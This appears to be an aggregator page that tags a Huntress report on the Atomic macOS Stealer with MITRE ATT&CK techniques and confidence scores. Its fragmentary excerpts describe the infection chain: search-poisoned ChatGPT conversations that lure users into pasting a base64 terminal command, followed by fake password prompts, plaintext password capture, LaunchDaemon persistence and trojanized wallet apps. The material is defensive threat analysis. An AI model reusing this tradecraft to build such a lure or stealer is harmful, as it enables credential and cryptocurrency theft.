TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

AI-Poisoning & AMOS Stealer: The Biggest Mac Threat | Huntress

2025-12-09 · Read original ↗

ATT&CK techniques detected

18 predictions
T1555.001Keychain
92%
“session - specific credential stores, browser databases, and authenticated application data that are unavailable to background daemons without visible re - authentication. by minimizing reliance on traditional plist - based persistence and maintaining user - context relaunching, …”
T1059.004Unix Shell
85%
“##uishable from the help it impersonates. what happens after the copy - paste once the victim executed the command, a multi - stage infection chain began. the base64 - encoded string in the terminal command decoded to a url hosting a malicious bash script, the first stage of an a…”
T1543.004Launch Daemon
84%
“. additionally, an app bundle resource is included that posts this data to the attacker - controlled web server. figure 7 : the applescript checks for ledger wallet and trezor suite and replaces them with a trojanized version the stealer is compiled as a native macos binary, not …”
T1543.001Launch Agent
74%
“. additionally, an app bundle resource is included that posts this data to the attacker - controlled web server. figure 7 : the applescript checks for ledger wallet and trezor suite and replaces them with a trojanized version the stealer is compiled as a native macos binary, not …”
T1204.004Malicious Copy and Paste
73%
“ai - poisoning & amos stealer : the biggest mac threat | huntress summary on december 5, 2025, huntress triaged an atomic macos stealer ( amos ) alert that initially appeared routine : data exfiltration, standard amos persistence, and no unusual infection chain indicators in the …”
T1059.002AppleScript
73%
“execute. before executing the next stage, it will verify that it is not running in a virtual machine and instead will run anti - vm logic. figure 6 : anti - vm logic to ensure the malware is not running inside a virtual machine stage 2 : loader and payload deployment with authori…”
T1059.004Unix Shell
72%
“and runs a bash script that requests the user ’ s credentials by simply asking for the " system password ”. once entered, the amos stealer looks to verify the password supplied by the victim. figure 5 : the bash script used to escalate to root the password prompt is not an actual…”
T1543.004Launch Daemon
61%
“##daemon called ` com. finder. helper. plis the launchdaemon ’ s responsibility is to run this hidden. agent script — an applescript - based watchdog loop that runs in the background. this. agent file was initially dropped as part of the first - stage dropper, an applescript call…”
T1566.002Spearphishing Link
58%
“ai - poisoning & amos stealer : the biggest mac threat | huntress summary on december 5, 2025, huntress triaged an atomic macos stealer ( amos ) alert that initially appeared routine : data exfiltration, standard amos persistence, and no unusual infection chain indicators in the …”
T1555Credentials from Password Stores
56%
“session - specific credential stores, browser databases, and authenticated application data that are unavailable to background daemons without visible re - authentication. by minimizing reliance on traditional plist - based persistence and maintaining user - context relaunching, …”
T1555.003Credentials from Web Browsers
54%
“session - specific credential stores, browser databases, and authenticated application data that are unavailable to background daemons without visible re - authentication. by minimizing reliance on traditional plist - based persistence and maintaining user - context relaunching, …”
T1566Phishing
45%
“ai - poisoning & amos stealer : the biggest mac threat | huntress summary on december 5, 2025, huntress triaged an atomic macos stealer ( amos ) alert that initially appeared routine : data exfiltration, standard amos persistence, and no unusual infection chain indicators in the …”
T1059.004Unix Shell
45%
“##ing an application or dmg, victims compromise themselves by copying a command directly from the browser into terminal. detection and mitigation recommendations : traditional signature - based detection will struggle with this campaign because the initial infection vector, a use…”
T1059.002AppleScript
42%
“##ing an application or dmg, victims compromise themselves by copying a command directly from the browser into terminal. detection and mitigation recommendations : traditional signature - based detection will struggle with this campaign because the initial infection vector, a use…”
T1059.002AppleScript
40%
“and runs a bash script that requests the user ’ s credentials by simply asking for the " system password ”. once entered, the amos stealer looks to verify the password supplied by the victim. figure 5 : the bash script used to escalate to root the password prompt is not an actual…”
T1204.004Malicious Copy and Paste
39%
“why we initially expected to find a user - executed command lure instead of a file - based delivery vector. instead, what we found was a simple google search, followed by a conversation with chatgpt : the victim had searched " clear disk space on macos. " google surfaced two high…”
T1059.004Unix Shell
38%
“background, no system ui, no touch id fallback, no visible authentication challenge. once a valid password is supplied, the script writes it in plaintext to a hidden file in the / tmp directory, called / tmp /. pass. once it moves to the next stage, it will move the file to the u…”
T1553.001Gatekeeper Bypass
35%
“servers threat actor evolution this campaign highlights several meaningful shifts in macos stealer tradecraft. two key delivery traits differentiate this campaign from traditional macos stealer deployment. - ai trust exploitation - attackers mimic the tone, formatting, and instru…”

Summary

Attackers are exploiting user trust in AI and aggressive SEO to deliver an evolved Atomic macOS Stealer. Learn why this social engineering tradecraft bypasses traditional network controls and the future of macOS infostealer defense.